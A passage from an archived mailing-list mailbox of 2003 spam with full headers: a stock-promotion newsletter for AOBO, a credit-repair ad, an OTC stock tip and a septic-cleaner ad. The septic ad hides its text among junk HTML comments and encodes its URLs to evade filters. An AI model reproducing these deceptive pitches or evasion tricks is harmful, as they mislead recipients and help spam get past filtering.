                                "font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;">aobo@biosly.com</SPAN></A><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;"><BR>
                                <BR>Hong Kong Contact: Clarence Chan<BR>852-9522-3111<BR>F: 852-2829-7410<BR></SPAN><A HREF="http://www.edirectoffers.com/aobo/mailto:sly@biosly.com"><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;">sly@biosly.com</SPAN></A>
                                <BR><BR><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;">Investor Contact: Harvey Goralnick/David Zazoff<BR>FOCUS Partners LLC<BR>212-752-9445<BR></SPAN><A
                                 HREF="http://www.edirectoffers.com/aobo/mailto:aobo@focuspartners.com"><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;">aobo@focuspartners.com</SPAN></A></P>
                            <P><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;">&#169; 2003 PRNewswire</SPAN></P>
                            <P><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;"><SPAN STYLE="color: rgb(0,51,102);"><B>more...</B><BR></SPAN><BR><B>
                                AOBO Completes Purchase of Soybean Protein Peptide Project</B><BR>12:06 pm - PR Newswire <BR>Friday January 24, 2003<BR><BR><A HREF="http://biz.yahoo.com/prnews/030124/nyf043_1.html"><B>
                                AOBO Expects to Have a Total of 65 Enuresis Soft Gel Clinics Operating in 2003</B></A><BR>9:14 am - PR Newswire <BR>Tuesday January 14, 2003<BR><BR><A HREF="http://biz.yahoo.com/prnews/030114/nytu090_1.html"><B>
                                AOBO Expands Into Japan; Signs LOI to Export Its Soybean Protein Peptide Products</B></A><BR>9:28 am - PR Newswire <BR>Monday January 6, 2003<BR><BR><A HREF="http://biz.yahoo.com/prnews/030106/nym123_1.html"><B>
                                AOBO Enters the Hong Kong Market</B></A><BR>10:25 am - PR Newswire&nbsp; </SPAN></P>
                        </TD>
                    </TR>
                    <TR>
                        <TD COLSPAN=5 STYLE="background-color: rgb(102,102,153);">
                            <P></P>
                        </TD>
                    </TR>
                    <TR>
                        <TD COLSPAN=5 STYLE="background-color: rgb(255,255,255); padding: 12px; border-top: 1pt solid rgb(0,0,0);">
                            <P STYLE="text-align: left;"><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: xx-small;"><SPAN STYLE="color: rgb(102,102,153);"><B>DISCLAIMER</B><BR></SPAN><SPAN STYLE=
                                "color: rgb(102,102,153);">This Email and Newsletter were sent to you as you requested information on <A HREF="http://www.edirectoffers.com">edirectoffers.com</A> of this nature.&nbsp; The views, discussion and opinions should be followed up with good research by your compliance department as well as your own researcher and/or advisor.&nbsp;&nbsp; This is a subscription mailing if you received this by email&nbsp; <A
                                 HREF="http://www.edirectoffers.com/Opt_Out/opt_out.html">To opt-out and never receive this newsletter again - Click Here and put unsubscribe in the subject line!</A>&nbsp; Very important removal instruction: To be 
                                removed you may do so via fax or email&nbsp; with the word unsubscribe and then your email address in the BODY of the message.. It should look like this &quot; unsubscribe youraddress@aol.com &quot;. The words in 
                                bold should be the only things written in the email .. It has to be done exactly that way. You must make sure you remove the address that we actually send mail to not a forwarded address..Thanks and sorry for any 
                                trouble.. </SPAN></SPAN></P>
                        </TD>
                    </TR>
                    <TR>
                        <TD>
                            <P></P>
                        </TD>
                        <TD WIDTH=230>
                            <P></P>
                        </TD>
                        <TD WIDTH=128>
                            <P></P>
                        </TD>
                        <TD WIDTH=132>
                            <P></P>
                        </TD>
                        <TD WIDTH=121>
                            <P></P>
                        </TD>
                    </TR>
                    <TR>
                        <TD>
                            <P></P>
                        </TD>
                        <TD>
                            <P></P>
                        </TD>
                        <TD>
                            <P></P>
                        </TD>
                        <TD>
                            <P></P>
                        </TD>
                        <TD>
                            <P></P>
                        </TD>
                    </TR>
                </TABLE>
            </TD>
        </TR>
    </TABLE>
</BODY>
</HTML>
 


From AOBO@edirectoffers.com Mon Feb 24 18:54:19 2003
Return-Path: <AOBO@edirectoffers.com>
Received: from sccrmhc03.attbi.com (sccrmhc03.attbi.com [204.127.202.63])
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with ESMTP id h1ONsIaN007092;
	Mon, 24 Feb 2003 18:54:19 -0500 (EST)
Message-Id: <200302242354.h1ONsIaN007092@netlib2.cs.utk.edu>
Received: from sccrmhc03.attbi.com (localhost[127.0.0.1])
          by sccrmhc03.attbi.com (sccrmhc03) with ESMTP
          id <200302242014380030005j0he>; Mon, 24 Feb 2003 20:14:42 +0000
X-Comment: AT&T Maillennium special handling code - x
Received: from newg (c-54-28-176-66.se.biz.attbi.com[66.176.28.54])
          by sccrmhc03.attbi.com (sccrmhc03) with SMTP
          id <2003022418225100300mm9soe>; Mon, 24 Feb 2003 18:23:05 +0000
X-Comment: AT&T Maillennium special handling code - x
From: "" <AOBO@edirectoffers.com>
To: "" <Loscompany@freemail.nl>, "" <mmunoz@cc.uantof.cl>,
   "" <tang@www.newimage.com.tw>, "" <bloomer@omen.net.au>,
   "" <dxg24@email.psu.edu>, "" <nick_hall@usa.net>, "" <ittek@sprynet.com>,
   "" <ricdiehl@pacbell.net>, "" <borsum@dascor.com>,
   "" <flint@krypton.tera.com>, "" <frenschecl@icon.co.za>,
   "" <cie90fpo@student.lth.se>, "" <samir@hotmail.com>,
   "" <sruffell@pgaero.co.uk>, "" <elscrapo@ix.netcom.com>,
   "" <m.catena@ifm-relay.inet.it>, "" <info@seetron.com>,
   "" <koloman_goetzl@yahoo.com>, "" <mm@ncs-net.com>,
   "" <jeff@dialup26.i-star.com>, "" <jeff@dialup13.i-star.com>,
   "" <rwolski@glasscity.net>, "" <bruno.schwander@technologist.com>,
   "" <gaus@alpha.fh-furtwangen.de>, "" <steve.brown@racalinst.co.uk>,
   "" <ramos_aurelio@emc.com>, "" <wkearson@gate.net>,
   "" <BFinn@bigpond.com.au>, "" <dcb@sirvys.com>, "" <hBTECH@MS16.HINET.NET>,
   "" <graml@biochem.mpg.de>, "" <DStephan@mail.ultratronik.de>,
   "" <willc@mediaone.net>, "" <digitech@niagara.com>, "" <tejasman2@aol.com>,
   "" <dave@dingbat.demon.co.uk>, "" <pjansen@execulink.com>,
   "" <wagnerl@earthlink.net>, "" <rvbaar@multiweb.nl>,
   "" <d55guy@engr.colostate.edu>, "" <student@sy.eni.com>,
   "" <parisy@labri.u-bordeaux.fr>, "" <bolesja@ece.orst.edu>,
   "" <jussi@koro.pp.fi>, "" <mkong@interlog.com>,
   "" <demitchel@worldnet.att.net>, "" <hee@asic.sec.samsung.co.kr>,
   "" <Mposey@ersi.com>, "" <erikoynl@netvigator.com>, "" <wmayewsky@ica.net>,
   "" <bab2610@unix.tamu.edu>, "" <gusr405@email.mot.com>,
   "" <kbookan@uwaterloo.uwaterloo.ca>, "" <st001796@hrzpub.tu-darmstadt.de>,
   "" <gembec@yahoo.com>, "" <desgronte@wilke.de>, "" <lmbraz@hotmail.com>,
   "" <vili@bgnet.bg>, "" <narasimha.kumar@intel.com>,
   "" <johnwong@cuhk.edu.hk>, "" <microboy@ix.netcom.com>,
   "" <tyler@eminent.net>, "" <desai@meru.com>, "" <axel.graf@zbs-ilmenau.de>,
   "" <sollie@mpinet.net>, "" <adrianrgc@yahoo.com>, "" <sallen@sirius.com>,
   "" <dongarra@CS.UTK.EDU>, "" <blast-funct@CS.UTK.EDU>,
   "" <m0vouYR-000iCjC@ishark.jf.intel.com>, "" <shane@ibeam.jf.intel.com>,
   "" <blast-funct@CS.UTK.EDU>, "" <199702051739.MAA21208@CS.UTK.EDU>,
   "" <lck@research.bell-labs.com>, "" <jglewis@redwood.rt.cs.boeing.com>,
   "" <199702212221.OAA09564@sulien.network-b>, "" <john.g.lewis@boeing.com>,
   "" <roger.g.grimes@boeing.com>, "" <jglewis@cs.washington.edu>,
   "" <sven@odin.nag.co.uk>, "" <199702251112.LAA25348@odin.nag.co.uk>,
   "" <sven@nag.co.uk>, "" <postmaster@CS.UTK.EDU>, "" <Nancy@email.com>,
   "" <20010304062923.2800A154C62@pop509-ec.mail.com>,
   "" <blast-funct-archive@netlib2.cs.utk.edu>,
   "" <blast-lb-archive@netlib2.cs.utk.edu>,
   "" <blast-lite-archive@netlib2.cs.utk.edu>,
   "" <blast-parallel-archive@netlib2.cs.utk.edu>,
   "" <blast-sparse-archive@netlib2.cs.utk.edu>,
   "" <biotechstox92@hotmail.com>, "" <385.843938.751234@hotmail.com>,
   "" <biotechinfo2007@yahoo.com>, "" <biotechsubscribe@yahoo.com>,
   "" <remobiotech@yahoo.com>, "" <christmaseveryday2001@yahoo.com>,
   "" <285.524316.109290@yahoo.com>, "" <beaconsubscribe@yahoo.com>,
   "" <beaconlistremo@yahoo.com>, "" <memorytogo@memorytogo4.com>
Cc: 
Date: Mon, 24 Feb 03 13:20:44 -0500
Subject: Press From AOBO
X-Mailer: ExclamationSoft Corporation Mail Version 2.0
X-MSMail-Priority: NORMAL
MIME-Version: 1.0
Content-Type: text/html;
	boundary="----=_ExClAmAtIoNsOfT_MaIl_PaRt_BoUnDaRy"

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
<META NAME="Generator" CONTENT="NetObjects Fusion 5.0 for Windows">
<TITLE>AOBO</TITLE>
<script>
function invitepopup(url) {window.open(url,'artist','width='+540+',height='+500+',scrollbars=yes,status=no');
}
</script>
<LINK REL=STYLESHEET TYPE="text/css" HREF="http://www.edirectoffers.com/aobo/./style.css">
<LINK REL=STYLESHEET TYPE="text/css" HREF="http://www.edirectoffers.com/aobo/./site.css">
<STYLE>
</STYLE>
</HEAD>
<BODY STYLE="text-align: center; background-color: rgb(102,102,153);" TOPMARGIN=0 LEFTMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0>
    <TABLE BORDER=0 CELLSPACING=0 CELLPADDING=0 NOF=LY>
        <TR VALIGN=TOP ALIGN=LEFT>
            <TD WIDTH=627>
                <TABLE ID="Table1" BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH=627>
                    <COLGROUP>
                    <COL WIDTH=16>
                    <COL WIDTH=230>
                    <COL WIDTH=128>
                    <COL WIDTH=132>
                    <COL WIDTH=121>
                    </COLGROUP>
                    <TR>
                        <TD COLSPAN=5 STYLE="background-color: rgb(255,255,255); border: 1pt solid rgb(0,0,0); padding: 4px;">
                            <P STYLE="text-align: right;"><B><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: xx-small;">&nbsp;<A HREF="http://www.edirectoffers.com/aobo/./Bio/bio.html">Home Page</A> - </SPAN></B><A HREF="http://www.edirectoffers.com/aobo/./Bio/bio.html"><B><SPAN
                                 STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: xx-small;">Company Info</SPAN></B></A><B><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; 
                                font-size: xx-small;">&nbsp; </SPAN></B></P>
                        </TD>
                    </TR>
                    <TR>
                        <TD COLSPAN=5 STYLE="border: 1pt solid rgb(0,0,0);">
                            <P><IMG ID="Picture3" HEIGHT=353 WIDTH=625 SRC="http://www.edirectoffers.com/aobo/./aobofront23456.jpg" VSPACE=0 HSPACE=0 ALIGN="TOP" BORDER=0 USEMAP="#map0"><MAP NAME="map0"><AREA SHAPE=RECT ALT="" COORDS="125,5,183,19" HREF="http://www.edirectoffers.com/aobo/./Bio/bio.html"><AREA
                                 SHAPE=RECT ALT="" COORDS="182,3,296,20" HREF="http://finance.yahoo.com/q?s=AOBO.OB&d=t"><AREA SHAPE=RECT ALT="" COORDS="295,1,406,20" HREF="http://biz.yahoo.com/n/a/aobo.ob.html"><AREA SHAPE=RECT ALT=""
                                 COORDS="406,6,519,19" HREF="http://finance.yahoo.com/q?s=AOBO.OB&d=v3"><AREA SHAPE=RECT ALT="" COORDS="310,67,584,292" HREF="http://biz.yahoo.com/n/a/aobo.ob.html"><AREA SHAPE=RECT ALT="" COORDS="16,28,307,341"
                                 HREF="http://finance.yahoo.com/q?s=AOBO.OB&d=t"></MAP></P>
                        </TD>
                    </TR>
                    <TR>
                        <TD WIDTH=16 STYLE="background-color: rgb(255,255,255); border-left: 1pt solid rgb(102,102,153); border-bottom: 1pt solid rgb(102,102,153);">
                            <P><SPAN STYLE="color: rgb(255,255,255);">.</SPAN></P>
                        </TD>
                        <TD COLSPAN=4 STYLE="background-color: rgb(255,255,255); border: 1pt solid rgb(102,102,153); padding: 7px;">
                            <P><B><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;"><A HREF="http://finance.yahoo.com/q?s=AOBO.OB&d=t">AOBO Completes Purchase of Soybean Protein Peptide Project</A>
                                <BR></SPAN></B><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: xx-small; color: rgb(255,0,0);">January 28, 2003 12:06:00 PM ET</SPAN></P>
                            <P><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;"><B>HONG KONG, Jan. 28 /PRNewswire-FirstCall/ -- American Oriental Bioengineering Inc. (OTC Bulletin Board: <A
                                 HREF="http://finance.yahoo.com/q?s=AOBO.OB&d=t">AOBO</A>)</B>
                                 announced that its board of directors has approved the completion of the Soybean Protein Peptide project purchase, worth an estimated $40 million, effective immediately.</SPAN></P>
                            <P><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;">On October 11, 2002, AOBO filed an Information Statement Pursuant to Section 14(c) of the Securities Exchange Act of 
                                1934, announcing that a total of 20,284,810 shares of Common Stock and 1,000,000 shares of Class A Preferred Stock will be issued by AOBO in consideration for 100% ownership interest in a soybean protein peptide 
                                biochemical engineering project (the &quot;Project&quot;) as described in the Purchase Agreement dated as of August 17, 2002 signed by Shujun Liu and AOBO. The value of the Common Stock to be issued is approximately 
                                $3,205,000, which is equivalent to $0.158 per share of common stock, which is the average of the closing price for the five-day period immediately following the date of the Purchase Agreement, August 19, 2002 to 
                                August 23, 2002. By acquiring the Project, among other assets, AOBO will acquire ownership of the building housing the Project's manufacturing plant, manufacturing equipment, and environmental control equipment of 
                                which the historical cost is approximately $3,205,000.</SPAN></P>
                            <P><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;">In addition, AOBO will receive the right to produce the products that resulted from the Project as well as ownership 
                                rights on a pending patent in China for the process of the extraction and production of soybean peptide. The Project, including the production, marketing and sales of various functional soybean peptide medical 
                                tablets and powders, has a fair market value of $40,406,000.</SPAN></P>
                            <P><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;">About American Oriental Bioengineering, Inc.</SPAN></P>
                            <P><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;">American Oriental Bioengineering, Inc. is a leading Chinese nutracuetical company that uses proprietary processes for 
                                producing soybean protein peptide more efficiently than traditional extracting techniques. These techniques are used to manufacture and formulate supplemental and medicinal products. The Company focuses on new 
                                product research to combine biotechnology and Chinese medical technology to capture the increasing demand for traditional Chinese medicines and health supplements, both domestically and internationally. Soybean 
                                peptides are used widely in general food and health food products, sports foods, medicines, fermentation industry and in environmental protection applications</SPAN></P>
                            <P><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;">Safe Harbor Statement</SPAN></P>
                            <P><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;">Except for the historical statements made herein, the statements made in this release are forward-looking statements, 
                                including. Risk factors that could cause actual results to differ materially from those projected in forward-looking statements include, but are not limited to, general business conditions, managing growth, and 
                                political and other business risks. Although the Company believes that the forward-looking statements contained herein are reasonable, it can give no assurance that the Company's expectations are correct. All 
                                forward-looking statements are expressly qualified in their entirety by this Cautionary Statement and the risks and other factors detailed in the Company's reports filed with the Securities and Exchange Commission.</SPAN>
                            </P>
                            <P><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;">China Contact: Lily Li<BR>86-451-6666601<BR>F: 86-451-6690967<BR></SPAN><A HREF="http://www.edirectoffers.com/aobo/mailto:aobo@biosly.com"><SPAN STYLE=
                                "font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;">aobo@biosly.com</SPAN></A><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;"><BR>
                                <BR>Hong Kong Contact: Clarence Chan<BR>852-9522-3111<BR>F: 852-2829-7410<BR></SPAN><A HREF="http://www.edirectoffers.com/aobo/mailto:sly@biosly.com"><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;">sly@biosly.com</SPAN></A>
                                <BR><BR><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;">Investor Contact: Harvey Goralnick/David Zazoff<BR>FOCUS Partners LLC<BR>212-752-9445<BR></SPAN><A
                                 HREF="http://www.edirectoffers.com/aobo/mailto:aobo@focuspartners.com"><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;">aobo@focuspartners.com</SPAN></A></P>
                            <P><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;">&#169; 2003 PRNewswire</SPAN></P>
                            <P><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: x-small;"><SPAN STYLE="color: rgb(0,51,102);"><B>more...</B><BR></SPAN><BR><B>
                                AOBO Completes Purchase of Soybean Protein Peptide Project</B><BR>12:06 pm - PR Newswire <BR>Friday January 24, 2003<BR><BR><A HREF="http://biz.yahoo.com/prnews/030124/nyf043_1.html"><B>
                                AOBO Expects to Have a Total of 65 Enuresis Soft Gel Clinics Operating in 2003</B></A><BR>9:14 am - PR Newswire <BR>Tuesday January 14, 2003<BR><BR><A HREF="http://biz.yahoo.com/prnews/030114/nytu090_1.html"><B>
                                AOBO Expands Into Japan; Signs LOI to Export Its Soybean Protein Peptide Products</B></A><BR>9:28 am - PR Newswire <BR>Monday January 6, 2003<BR><BR><A HREF="http://biz.yahoo.com/prnews/030106/nym123_1.html"><B>
                                AOBO Enters the Hong Kong Market</B></A><BR>10:25 am - PR Newswire&nbsp; </SPAN></P>
                        </TD>
                    </TR>
                    <TR>
                        <TD COLSPAN=5 STYLE="background-color: rgb(102,102,153);">
                            <P></P>
                        </TD>
                    </TR>
                    <TR>
                        <TD COLSPAN=5 STYLE="background-color: rgb(255,255,255); padding: 12px; border-top: 1pt solid rgb(0,0,0);">
                            <P STYLE="text-align: left;"><SPAN STYLE="font-family: Arial, Helvetica, Univers, 'Zurich BT', sans-serif; font-size: xx-small;"><SPAN STYLE="color: rgb(102,102,153);"><B>DISCLAIMER</B><BR></SPAN><SPAN STYLE=
                                "color: rgb(102,102,153);">This Email and Newsletter were sent to you as you requested information on <A HREF="http://www.edirectoffers.com">edirectoffers.com</A> of this nature.&nbsp; The views, discussion and opinions should be followed up with good research by your compliance department as well as your own researcher and/or advisor.&nbsp;&nbsp; This is a subscription mailing if you received this by email&nbsp; <A
                                 HREF="http://www.edirectoffers.com/Opt_Out/opt_out.html">To opt-out and never receive this newsletter again - Click Here and put unsubscribe in the subject line!</A>&nbsp; Very important removal instruction: To be 
                                removed you may do so via fax or email&nbsp; with the word unsubscribe and then your email address in the BODY of the message.. It should look like this &quot; unsubscribe youraddress@aol.com &quot;. The words in 
                                bold should be the only things written in the email .. It has to be done exactly that way. You must make sure you remove the address that we actually send mail to not a forwarded address..Thanks and sorry for any 
                                trouble.. </SPAN></SPAN></P>
                        </TD>
                    </TR>
                    <TR>
                        <TD>
                            <P></P>
                        </TD>
                        <TD WIDTH=230>
                            <P></P>
                        </TD>
                        <TD WIDTH=128>
                            <P></P>
                        </TD>
                        <TD WIDTH=132>
                            <P></P>
                        </TD>
                        <TD WIDTH=121>
                            <P></P>
                        </TD>
                    </TR>
                    <TR>
                        <TD>
                            <P></P>
                        </TD>
                        <TD>
                            <P></P>
                        </TD>
                        <TD>
                            <P></P>
                        </TD>
                        <TD>
                            <P></P>
                        </TD>
                        <TD>
                            <P></P>
                        </TD>
                    </TR>
                </TABLE>
            </TD>
        </TR>
    </TABLE>
</BODY>
</HTML>
 


From Credit_Doctor_672@aloha.net Sat Mar  1 13:22:23 2003
Return-Path: <Credit_Doctor_672@aloha.net>
Received: from 81.116.71.146 ([81.116.71.146])
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with SMTP id h21IMKaN028541
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 1 Mar 2003 13:22:21 -0500 (EST)
Message-Id: <200303011822.h21IMKaN028541@netlib2.cs.utk.edu>
Received: from [42.47.39.56] by mta6.snfc21.pbi.net with SMTP; Mar, 01 2003 11:00:09 AM -0200
Received: from [72.62.68.193] by rly-yk04.mx.aol.com with asmtp; Mar, 01 2003 10:13:05 AM +0400
From: Kondrad <Credit_Doctor_672@aloha.net>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Re: About Your Credit........... ijyee
Sender: Kondrad <Credit_Doctor_672@aloha.net>
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Date: Sat, 1 Mar 2003 12:22:14 -0600
X-Mailer: MIME-tools 5.503 (Entity 5.501)

<p align="center"><img border="0" src="http://www.cjlinc.net/CJ01.gif" width="501" height="64"></p>
<p>We can fix your credit.  We are very successful at getting 
bankruptcies, judgments, tax liens, foreclosures, late payments, charge-offs, 
repossessions, and even student loans removed from a persons credit report.  To find out more go to
<a href="http://www.cjlinc.net">http://www.cjlinc.net</a>.</p>
<p>If you no longer want to receive information from us just go to 
<a href="mailto:tallrhe@cs.com">tallrhe@cs.com</a>.<p>
&nbsp;

uuqfyentsblbpqnqwbodgfyboqikgk

From Great_Stock_Picks_369@dell.com Sat Apr  5 14:09:43 2003
Return-Path: <Great_Stock_Picks_369@dell.com>
Received: from 24.157.56.109 (12-224-34-254.client.attbi.com [12.224.34.254])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h35J9dSP008077
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 5 Apr 2003 14:09:42 -0500 (EST)
Message-Id: <200304051909.h35J9dSP008077@netlib2.cs.utk.edu>
Received: from a231242.upc-a.chello.nl ([96.216.72.224]) by m10.grp.snv.yahoo.com with NNFMP; Apr, 05 2003 12:04:57 PM -0000
Received: from unknown (HELO f64.law4.hotmail.com) (13.61.40.178) by ssymail.ssy.co.kr with smtp; Apr, 05 2003 10:47:57 AM -0200
From: Listy <Great_Stock_Picks_369@dell.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: STOCK MARKET PLAYERS: NMMG Introduces LED OnScreen Technology!!!......... omvjj
Sender: Listy <Great_Stock_Picks_369@dell.com>
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Date: Sat, 5 Apr 2003 13:09:27 -0600
X-Mailer: Microsoft Outlook Express 6.00.2462.0000

<p align="center">
<img border="0" src="http://204.188.76.85/LIVE_FROM_THE_WIRE.gif" width="427" height="55"></p>
<p>NMMG has acquired majority worldwide manufacturing and marketing rights to a 
new light-emitting- diode (LED) display technology that has been deemed 
&quot;revolutionary&quot; by many leaders in the LED, light and display industries. A 
scientific advisory board consisting of some of the brightest minds in 
engineering, physics and technology development has been formed to ensure 
success in the development of what could represent a paradigm shift in large 
scale display technology.&nbsp; </p>
<p>To find out more go to <a href="http://transworldwebsites.com/EM.htm">
Live From the Wire</a>.</p>
<p>&nbsp;<p>&nbsp;<p>If you no longer want to receive information from us just go to 
<a href="mailto:tallrhe@cs.com">tallrhe@cs.com</a>.<p>
&nbsp;

txpvqxrcrqguylgtfr

From xpatsyko8jye@msn.com Mon Apr 14 21:41:36 2003
Return-Path: <xpatsyko8jye@msn.com>
Received: from hotmail.com (bay3-dav157.bay3.hotmail.com [65.54.169.187])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with ESMTP id h3F1fZSP017520;
	Mon, 14 Apr 2003 21:41:35 -0400 (EDT)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Mon, 14 Apr 2003 18:41:25 -0700
Received: from 193.251.60.90 by bay3-dav157.bay3.hotmail.com with DAV;
	Tue, 15 Apr 2003 01:41:25 +0000
X-Originating-IP: [193.251.60.90]
X-Originating-Email: [xpatsyko8jye@msn.com]
To: "Fernsler Lecomte" <FernslerLecomte@email.com>
Subject: To Perfectly Uphold Septic Tanks              oC07WyG1LP1JA4
From: "Mcmahill Hinshaw" <McmahillHinshaw@netscape.net>
X-Originating-Ip: [83.6.43.399]
X-Mailer: Microsoft Outlook Express 5.00.2014.211
X-Comment: e02KswGriNl8P3311HI4T8n63u4YwKKF
X-MIMEOLE: Produced By Microsoft MimeOLE V5.00.2014.211
X-Accept-Language: en
Content-Type: multipart/alternative; boundary="I5t0fO0qvt2F664NqQ7C27B617H2T4B7A32IP2N5m2Mwbd6360xSG8WgVwDNsu303"
Content-Transfer-Encoding: 7bit
Message-ID: <BAY3-DAV157KKQpQq5p00012f49@hotmail.com>
X-OriginalArrivalTime: 15 Apr 2003 01:41:25.0782 (UTC) FILETIME=[2089E360:01C302F0]
Date: 14 Apr 2003 18:41:25 -0700

--I5t0fO0qvt2F664NqQ7C27B617H2T4B7A32IP2N5m2Mwbd6360xSG8WgVwDNsu303
Content-Transfer-Encoding: 7bit
Content-Type: text/html; charset="ISO-8859-1"

<HTML><CENTER><table border=0 cellpadding=6 width=450 bgcolor=#FFFFFF>
<TR><TD ALIGN=LEFT VALIGN=TOP><FONT style="FONT-SIZE: 18px; COLOR: #358211; FONT-FAMILY: Arial;">
<CENTER><B>K<!O>eep<!Y> Y<!W>ou<!K>r<!F> <!G>Sep<!J>t<!M>i<!U>c<!Y> W<!S>o<!X>rki<!W>ng<!Z> E<!O>ffic<!G>ien<!J>tl<!L>y!</B><FONT COLOR=black><BR>
<FONT style="FONT-SIZE: 16px; COLOR: #343230; FONT-FAMILY: Arial;">
<B>G<!J>e<!X>t<!J> <!O>A <!V><FONT COLOR=RED>F<!N>REE<!Y></FONT> T<!D>r<!F>i<!T>a<!M>l <!R>of<!Z> SPC<!P> <!B>Se<!I>p<!F>t<!X>ic C<!T>l<!T>e<!O>an<!E>e<!K>r<!T></B><BR><BR>
<A HREF=http://%76%6Ci%6Eg%2Db%75y%2Ec%6F%6D/spc/index.html style="FONT-SIZE: 18px; COLOR: #E64533; FONT-FAMILY: Arial;">C<!Q>li<!H>c<!W>k<!C> <!S>H<!E>e<!V>r<!I>e<!H> <!U>Fo<!N>r<!C> <!U>M<!B>o<!K>r<!I>e I<!Q>n<!I>fo<!S>r<!F>ma<!G>t<!N>io<!C>n</A><BR><BR>
<FONT style="FONT-SIZE: 16px; COLOR: #484544; FONT-FAMILY: Arial;"></CENTER><UL>
<LI>Sim<!S>p<!M>l<!R>y<!C> t<!L>h<!P>e <!Z>mo<!B>st <!E>e<!Q>ff<!O>ec<!C>t<!W>iv<!D>e<!J> s<!E>e<!M>pt<!Y>ic<!K> <!B>m<!N>a<!E>i<!R>n<!Q>tenanc<!B>e <!B>p<!I>rodu<!B>c<!P>t a<!G>va<!O>ila<!Y>bl<!W>e!<!K><LI>M<!F>a<!G>ke <!J>y<!M>o<!U>u<!Y>r <!S>s<!X>ept<!W>ic<!Z> w<!O>ork <!G>as <!J>we<!L>ll <!J>a<!X>s<!J> <!O>th<!V>e<!N> da<!Y>y <!D>i<!F>t<!T> <!M>wa<!R>s <!Z>inst<!P>a<!B>ll<!I>e<!F>d<!X>!<LI RR><B>100% environmentally safe</B>, and in no way can harm you, your children, pets or your septic system.</UL><CENTER>
<A HREF=http://%76%6Cing-b%75y.%63o%6D/spc/index.html style="FONT-SIZE: 18px; COLOR: #E64533; FONT-FAMILY: Arial;">Cli<!T>c<!T>k<!O> H<!E>e<!K>r<!T>e<!Q> F<!H>o<!W>r<!C> <!S>M<!E>o<!V>r<!I>e<!H> <!U>In<!N>f<!C>o<!U>r<!B>m<!K>a<!I>tio<!Q>n<!I></A><BR><BR>
<FONT COLOR=GRAY SIZE=-2 RR><A HREF="http://vlin%67-%62%75y.%63om/spc/remove.html">cl<!S>i<!F>ck<!G></A> <!N>an<!C>d st<!S>o<!M>p<!R> <!C>th<!L>i<!P>s <!Z>ma<!B>il<BR RR><!-- oEX4VAVFZya0k0VDA0LTE0MlI4TU0xdTRZd0s=XMiUhKH38I4P4Gt1016110 --></TD></TR></TABLE></HTML>

--I5t0fO0qvt2F664NqQ7C27B617H2T4B7A32IP2N5m2Mwbd6360xSG8WgVwDNsu303--


From MoneymakerRygg@aol.com Sat Apr 26 02:04:19 2003
Return-Path: <MoneymakerRygg@aol.com>
Received: from sinop.unemat-net.br ([200.101.115.55])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with ESMTP id h3Q64HSP016357
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 26 Apr 2003 02:04:18 -0400 (EDT)
Received: from 200.163.61.189 (200-163-61-189-cbabm7004.dsl.telebrasilia.net.br [200.163.61.189])
	by sinop.unemat-net.br (Postfix) with SMTP
